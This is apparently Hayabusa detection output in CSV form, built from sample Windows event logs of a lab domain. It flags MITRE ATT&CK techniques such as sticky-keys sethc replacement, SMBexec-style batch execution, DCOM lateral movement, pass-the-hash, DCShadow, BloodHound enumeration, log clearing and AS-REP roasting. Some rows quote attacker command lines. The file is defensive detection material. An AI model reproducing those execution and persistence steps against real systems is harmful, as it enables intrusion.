0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx 2021-04-26 18:18:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1464 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx 2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx 2021-04-26 23:16:45.757 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\seth2c.exe | Process: C:\Windows\system32\cmd.exe | PID: 1960 | PGUID: 7CF65FC7-C199-6086-520A-000000002000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx 2021-04-26 23:16:47.267 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\sethc.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3328 | PGUID: 7CF65FC7-CAF6-6086-930A-000000002000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution 
Options Injection/ID11-New sethc file created from CMD copy.evtx 2021-04-27 00:03:05.976 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\execute.bat | Process: C:\Windows\system32\cmd.exe | PID: 3492 | PGUID: 7CF65FC7-D629-6086-B70A-000000002000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID11,13-SMBexec service registration.evtx" 2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | LID: 0x3e7 | PID: 3068 | PGUID: 7CF65FC7-D629-6086-B80A-000000002000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx 2021-04-27 00:16:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1548 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 
2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5429550,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542957e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:04.047 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\mmc.exe -Embedding | Path: C:\Windows\System32\mmc.exe | PID: 0xda4 | User: SRVDEFENDER01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542a072,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed 
Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 20:04:03.495 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" 2021-04-27 20:04:03.502 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" 2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" 2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" 2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c301,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 
0x20ee2c3d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c901,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee3135,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2847721c,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x74005fb3,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share 
Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb108529d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f93ef,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd49db,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204a9a12,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 
| LID: 0x28477800,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cbf9f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f8ca7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x740075dc,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb1086cfb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f9930,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd4ec6,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204aa3a4,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cf99e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f96be,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ac4,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df84d08,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d352ca,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13fa915,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x87371f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ff1,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df8549a,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d35acf,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13faf39,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x873c5b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: 
Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66373,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66373,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66389,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66389,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
